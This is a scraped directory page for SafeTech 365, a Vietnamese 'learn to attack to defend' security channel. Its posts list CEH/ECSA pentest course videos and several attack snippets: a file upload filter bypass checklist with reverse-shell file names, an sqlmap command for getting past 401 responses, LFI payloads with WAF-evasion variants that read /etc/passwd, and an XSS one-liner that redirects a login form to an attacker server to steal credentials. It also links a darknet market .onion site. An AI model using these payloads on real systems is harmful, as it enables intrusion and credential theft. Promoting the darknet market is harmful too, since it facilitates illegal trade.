SafeTech 365

Home
SafeTech 365

Contact information, map and directions, contact form, opening hours, services, ratings, photos, videos and announcements from SafeTech 365, TV Channel, .
(31)

**Chia sẻ Kiến Thức&Clip ATTT Miễn Phí **
**Học Tấn công để Phòng Thủ**
*Nơi chia sẻ DeepLink cho các DeepWeb đồng đạo không phân biệt xuất thân*
Offensive-security,Stay Safe

>>Youtube channel
+ Kênh Chính Thức
https://www.youtube.com/channel/UCb1HWzdFghgtSC6bzg7tPMw
+ Kênh Dự Phòng https://www.youtube.com/channel/UCoL-htuEL9Ump1_tglkUVig

17/12/2023

Elysium DarkNet Market

Elysium is a DarkNet that have features like public and private username security to fight with phishing. they also have Autowithdraw, Jabberbot, Multisig support

Browse for Free: http://46oqn4lbjglrxsw2zp5mwarr6mnzcklq4wlcjry5yfrrl3yymiuo2cad.onion

Chí

27/06/2023

# Server-Side Prototype Pollution #
This contains a collection of Server-Side Prototype Pollution gadgets in Node.js core code and 3rd party NPM packages.

18/05/2023

# Malicious File Upload Checklist

# # Checklist

- [ ] { Try various file extensions } : Try different versions of the file extensions, for example php3, .php4, .php5, phtml for PHP scripts, asp,aspx and ashx for IIS
**Extension Links** ➖ https://github.com/danielmiessler/SecLists
- [ ] { Append an extra file extension }: If The application is not properly validating for the file extension, this can be exploited by appending another extension, for example from script.php to script.php.gif or script.gif.php
- [ ] { Improper Implementation of Regex } : Check if regex only satisfying by including only extension name in filename anywhere like hellopng.php | Check if regex satisfying by including that extension in last like hello.php.asdfpng
- [ ] { Change the casing of the extension } : ExtensionTry different combinations of lower and upper case, for example pHp, PhP, phP, Php etc
- [ ] { Application allows to upload .svg file ? } : SVG images are just XML data. Using XML you can achieve lots of vulnerabilities, for instance a Stored XSS as below
- [ ] { Change content type } : When intercepting the request using Burp Suite, the content type can be changed, for example from “Content-type: application/x-php” to “Content-type: image/gif”
- [ ] { Add a magic byte to the file } : Magic bytes function as signatures used by the web server to identify the type of file that is being uploaded. For example, when adding “GIF87a” to the beginning of the script, the server will think of it as a GIF file.
Like : Change Filename=’1.php’ and filetype : image/gif And start the file content with GIF29a
- [ ] { Try reducing the file size } : If a file size restriction is being used, a smaller script can be uploaded to gain remote code ex*****on, such as :

💡 ,

- [ ] { Try using executable extensions } : Certain executable extensions may still be allowed, for example .phtml, .shtml, .asa, .cer”, “.asax”, “.swf”, or “.xap”.
- [ ] { Add a null byte to the file name } : If the site is using file extension whitelists, this can often be bypassed by adding %00 (HTML encoding) or \x00 (hex encoding) to the end of the file name. For example:

> php-reverse-shell.php%00.gif
>
- [ ] { Add special characters before file extension } : In order webservers, adding special characters such as ;%$& just after the file name, for example shell;.php can help bypass file extension whitelists
- [ ] { Insert EXIF data } : An executable script can be inserted into an image in the form of a metadata comment, which will then be executed when the web server uses the image in a page
- [ ] { Try using Windows 8.3 notation for the file name } : The Windows 8.3 short name version can be used in the file name. For example shell.aspx will become SHELL~1.ASP
- [ ] { Try finding characters that are converted to other useful characters during the file upload process. } : For instance, when running PHP on IIS, the “>”, “

13/05/2023

If you find 401 Unauthorized, try to test with SQLmap
sqlmap -u $url --forms --crawl=2 --dbs --ignore-code=401
--->Bypassed
--->Bounty

08/05/2023

Local File Inclusion (LFI) is one of the most common vulnerability in today's Web Applications having High to Critical severity.

1. Basic
/index.php?language=/etc/passwd (basic)
/index.php?language=../../../../etc/passwd (with path traversal)
/index.php?language=/../../../etc/passwd (with prefix)
/index.php?language=./languages/../../../../etc/passwd (with approved path)

2. WAF and Filters Evasion
(basic path traversal filter)
/index.php?language=....//....//....//....//etc/passwd

(url encoding filter)
/index.php?language=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64

(path truncation filter)
/index.php?language=non_existing_directory/../../../etc/passwd/./././.[./ REPEATED ~2048 times]

(null byte)
index.php?language=../../../../etc/passwd%00

(using php filter)
index.php?language=php://filter/read=convert.base64-encode/resource=config

(obfuscation techniques)
/fileRead.php?fileName=/etc/passwd (406📛)
/fileRead.php?fileName=/?tc/?asswd (200✅)
/fileRead.php?fileName=/??c/??sswd (200✅)
/fileRead.php?fileName=/???/p?s?wd
/fileRead.php?fileName=/???/???swd
/fileRead.php?fileName=/???/*swd
/fileRead.php?fileName=/???/*******swd

06/03/2023

Pre-login XSS?
Attackers can steal credentials by changing HTML form action: x=document.querySelector('form');x.setAttribute('method','GET');x.setAttribute('action','http://attack-server/');

Try it out: https://pastecode.io/s/8kcjwvn1

Address

Telephone

+84924440241

Website

https://safetech365.blogspot.com/

Alerts

Be the first to know and let us send you an email when SafeTech 365 posts news and promotions. Your email address will not be used for any other purpose, and you can unsubscribe at any time.

Contact The Business

Send a message to SafeTech 365:

Videos

Harvard Edu - From XSS to Open Redirect(BibbibCannonist Parameter)

Harvard Edu - From XSS to Open Redirect(BibbibCannonist Parameter) Một POC khác về Harvard Edu...lần này là combo XSS to Open Redirect...các param cũ mà mình đã report có thể làm tương tự .Có gì Mọi người góp ý cho mình nhé P/S nếu sắp tới,mình mở một talkshow nói về vụ Harvard vừa rồi thì có ai tham gia ko nhỉ? #HoàngCaoChí

Tấn công và khai thác lỗ hổng Vmware

gửi anh em clip live stream tấn công Vmware 2018 phiên bản mới nhất dành cho bạn nào chưa xem. #gocchiase #HoàngCaoChí

SafeTech365 An Ninh Mạng Nâng Cao-ECSAv9(Module 13)

<> ++Người thực hiện #HoàngCaoChí ++Link youtube https://www.youtube.com/watch?v=JK2j9r8pw9Y Clip trình bày module 13 "Kiểm Thử Mạng Không Dây" với 2 nội dung chính : --Lý Thuyết:ôn tập các khái niệm "Wireless Network Hacking" cũng như tổng hợp quy trình iOT Pentesting và iOT attack surface --Thực Hành:demo thực hành "Thử Nghiệm xâm nhập thiết bị iOT" thông qua ví dụ "Thử Nghiệm xâm nhập IP Camera" Xin mời các bạn theo dõi p/s Nghiên cứu thì cứ thoải mái nhưng đừng vượt quá giới hạn Luật Pháp nhé.

SafeTech365 An Ninh Mạng Nâng Cao-ECSAv9(Module 12)

<> ++Người thực hiện #HoàngCaoChí ++Link trên youtube https://youtu.be/ZW2Wc3SeKfw Mời các bạn theo dõi clip trình bày module 12 Database Pentesting Methodology với 2 nội dung chính : --Lý thuyết:giới thiệu cách thức pentest đối với từng loại Database riêng biệt và những tool hỗ trợ --Thực hành:một vài kĩ thuật thu thập thông tin cơ bản của database bằng metasploit.

SafeTech365 An Ninh Mạng Nâng Cao-ECSAv9(Module 11)

<> ++Người thực hiện #HoàngCaoChí ++Link trên youtube https://www.youtube.com/watch?v=8fhTl6aPGUU&t=217s Mời các bạn theo dõi clip trình bày module 11 SQL Penetration Testing Methodology của chương trình ECSAv9 với 2 nội dung chính là: --Lý thuyết:giới thiệu quá trình SQL pentest,cập nhật SQLinjection cheetsheet cũng như cập nhật tool hỗ trợ thực hiện SQLinjection --Thực hành:Lab demo các kỹ thuật SQLi Pentesting trên lab nội bộ và target thực tế

SafeTech365 An Ninh Mạng Nâng Cao-ECSAv9(Module 10)

<> ++Người thực hiện #HoàngCaoChí ++Link trên Youtube https://youtu.be/2nXcz2MXg9M Mời các bạn theo dõi clip trình bày module 10 Web Applications PenetrationTesting của chương trình ECSAv9 với 2 nội dung chính là: --Lý thuyết:Các khái niệm cũng như những bước quan trọng trong quá trình thực hiện Web Applications PenetrationTesting --Thực hành:Lab demo các kỹ thuật WebApps Pentesting trên nền WebApps Target dựng sẵn là OWASP Mutillidae 2017

SafeTech365 An Ninh Mạng Nâng Cao-ECSAv9(Module 9)

<> ++Link trên youtube https://youtu.be/IWdPu21ypuE?list=PLxW7Vi47bWEE6yCiwRZOqIl0LQExEhFuX ++Người thực hiện #HoàngCaoChí Mời các bạn theo dõi clip trình bày module 8 IDS PenetrationTesting của chương trình ECSAv9 với 2 nội dung chính như sau: --Lý thuyết:giới thiệu các bước quan trọng,các khái niệm về IDS Pentesting và các giải pháp IDS --Thực hành:một số kỹ thuật bypass IDS thông dụng

SafeTech365 An Ninh Mạng Nâng Cao-ECSAv9(Module 8)

<> ++Link trên youtube https://youtu.be/85oRRPkKu38 ++Người thực hiện #HoàngCaoChí Xin mời các bạn theo dõi clip trình bày module 8 Firewall PenetrationTesting của chương trình ECSAv9 với 2 nội dung chính như sau: --Lý thuyết:giới thiệu các bước quan trọng,các khái niệm về Firewall cũng như những khái niệm về Firewall Pentesting --Thực hành:Lab demo những kỹ thuật nhận diện Firewall và 1 số kĩ thuật vượt mặt Firewall

SafeTech365 An Ninh Mạng Nâng Cao-ECSAv9(Module 7)

<> ++Link trên youtube https://youtu.be/gl4luyQQEFU ++Người thực hiện #HoàngCaoChí Xin mời các bạn theo dõi clip trình bày module 7 Internal Network PenetrationTesting của chương trình ECSAv9 với 2 nội dung chính như sau: --Lý thuyết:giới thiệu các bước quan trọng của quá trình Internal Network PenetrationTesting --Thực hành:Lab demo những kỹ thuật Internal Network Pentest từ cơ bản đến chuyên sâu

SafeTech365 An Ninh Mạng Nâng Cao ECSAv9(Module 6)

<> ++Link trên youtube https://youtu.be/7Jm_mpA5YsA ++Người thực hiện #HoàngCaoChí Clip trình bày module 6 External Network PenetrationTesting của chương trình ECSAv9 với 2 nội dung chính như sau: --Lý thuyết:giới thiệu các bước quan trọng của quá trình External Network PenetrationTesting cũng như trình bày sơ lược các cách thức quét mạng và những công cụ hỗ trợ tương ứng --Thực hành:Lab demo những cách thức External Network Pentest cơ bản.

SafeTech365 An Ninh Mạng Nâng Cao-ECSAv9(Module 4)

<> ++Người thực hiện #HoàngCaoChí ++Link trên youtube https://youtu.be/DYCdPoMr0ck Clip trình bày module 4-Infomation Gathering Methodology của chương trình ECSAv9- với 2 nội dung chính như sau: --Lý thuyết:giới thiệu sơ lược những thông tin cơ bản cũng như sơ lược về cách thức tìm manh mối ban đầu của 1 trang web --Thực hành:demo thực tế các kĩ thuật thu thập thông tin website P/S cảm ơn các bạn đã theo dõi,mọi thắc mắc có liên quan xin comment bên dưới

SafeTech365 An Ninh Mạng Nâng Cao-ECSAv9(Module 3)

<> Clip trình bày ngắn gọn những thủ tục cần làm trước khi pentest ++Link trên youtube https://youtu.be/cWFbZi7Z6_8 ++Người thực hiện #HoàngCaoChí

SafeTech365 An Ninh Mạng Nâng Cao-ECSA v9 (Module 1)

An Ninh Mạng Nâng Cao-ECSA v9 (Module 1):Sơ lược về Penetration Test ++Link trên Youtube https://youtu.be/GoluED3t8oM ++Người thực hiện #HoàngCaoChí

SafeTech365 CEH Course 2017(Module 18)Cloud Computing

<> ++Link trên youtube https://youtu.be/0QHxTsURkG8 Module ôn tập cuối cùng của series.Xin mời các bạn theo dõi #HoàngCaoChí

SafeTech365 CEH course 2017(Module 17) IDS-Firewall-Honeypots

<> ++Người Thực hiện và hướng dẫn:#HoàngCaoChí ++Link trên youtube https://www.youtube.com/watch?v=Td69dP79iGI Clip ôn tập những chủ điểm Lý Thuyết và DEMO Thực Hành của module IDS-Firewall-Honeypots với 2 nội dung chính --Lý thuyết:giới thiệu các giải pháp IDS-Firewall và Honeypots --Thực hành:Cấu hình Firewall cơ bản Xin mời các bạn theo dõi.Mọi thắc mắc liên quan xin comment bên dưới

SafeTech365 CEH Course 2017(module 16)Hacking Mobile Platforms

<> ++Người Thực hiện và hướng dẫn:#HoàngCaoChí ++Link trên Youtube https://www.youtube.com/watch?v=yolVLWxfzRE Clip ôn tập những chủ điểm Lý Thuyết và DEMO Thực Hành của module Hacking Mobile Platforms với 2 nội dung chính --Lý Thuyết:các kỹ thuật tấn công thiết bị di động và cách phòng chống(attack & defense methods) --Thực Hành:Lab demo khai thác lỗ hổng mới nhất của thiết bị Android Xin mời các bạn theo dõi.Mọi thắc mắc liên quan xin comment bên dưới

Shortcuts

Address
Telephone
Alerts
Contact The Business
Videos
Claim ownership or report listing
Want your business to be the top-listed Media Company?

Country:

City: